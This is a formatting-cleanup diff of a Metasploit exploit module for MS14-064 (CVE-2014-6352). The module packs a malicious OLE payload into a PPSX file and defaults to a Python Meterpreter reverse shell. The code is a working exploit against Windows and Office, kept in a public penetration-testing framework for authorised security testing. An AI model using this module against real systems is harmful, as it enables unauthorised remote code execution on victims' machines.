@@ -11,51 +11,57 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::FILEFORMAT
   include Msf::Exploit::EXE
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python",
-      'Description'    => %q{
-        This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)
-        allowing arbitrary code execution, bypassing the patch MS14-060, for the vulnerability
-        publicly known as "Sandworm", on systems with Python for Windows installed. Windows Vista
-        SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be vulnerable.
-        However, based on our testing, the most reliable setup is on Windows platforms running
-        Office 2013 and Office 2010 SP2. Please keep in mind that some other setups such as
-        those using Office 2010 SP1 may be less stable, and may end up with a crash due to a
-        failure in the CPackage::CreateTempFileName function.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => "MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python",
+        'Description' => %q{
+          This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)
+          allowing arbitrary code execution, bypassing the patch MS14-060, for the vulnerability
+          publicly known as "Sandworm", on systems with Python for Windows installed. Windows Vista
+          SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be vulnerable.
+          However, based on our testing, the most reliable setup is on Windows platforms running
+          Office 2013 and Office 2010 SP2. Please keep in mind that some other setups such as
+          those using Office 2010 SP1 may be less stable, and may end up with a crash due to a
+          failure in the CPackage::CreateTempFileName function.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'Haifei Li', # Vulnerability discovery and exploit technique
           'sinn3r', # Metasploit module
           'juan vazquez' # Metasploit module
         ],
-      'References'     =>
-        [
+        'References' => [
           ['CVE', '2014-6352'],
           ['MSB', 'MS14-064'],
           ['BID', '70690'],
           ['URL', 'http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-for-the-sandworm-zero-day-even-editing-can-cause-harm']
         ],
-      'Platform'       => 'python',
-      'Arch'           => ARCH_PYTHON,
-      'Targets'        =>
-        [
+        'Platform' => 'python',
+        'Arch' => ARCH_PYTHON,
+        'Targets' => [
           ['Windows 7 SP1 with Python for Windows / Office 2010 SP2 / Office 2013', {}],
         ],
-      'Privileged'     => false,
-      'DefaultOptions' =>
-        {
+        'Privileged' => false,
+        'DefaultOptions' => {
           'Payload' => 'python/meterpreter/reverse_tcp'
         },
-      'DisclosureDate' => '2014-11-12',
-      'DefaultTarget'  => 0))
+        'DisclosureDate' => '2014-11-12',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 
     register_options(
       [
         OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx'])
-      ])
+      ]
+    )
   end
 
   def exploit
@@ -72,13 +78,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     Dir["#{data_dir}/**/**"].each do |file|
       unless File.directory?(file)
-        zip_data[file.sub(data_dir,'')] = File.read(file, mode: 'rb')
+        zip_data[file.sub(data_dir, '')] = File.read(file, mode: 'rb')
       end
     end
 
     # add the otherwise skipped "hidden" file
     file = "#{data_dir}/_rels/.rels"
-    zip_data[file.sub(data_dir,'')] = File.read(file, mode: 'rb')
+    zip_data[file.sub(data_dir, '')] = File.read(file, mode: 'rb')
 
     # put our own OLE streams
     zip_data['/ppt/embeddings/oleObject1.bin'] = ole_payload
@@ -86,8 +92,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # create the ppsx
     ppsx = Rex::Zip::Archive.new
-    zip_data.each_pair do |k,v|
-      ppsx.add_file(k,v)
+    zip_data.each_pair do |k, v|
+      ppsx.add_file(k, v)
     end
 
     ppsx.pack
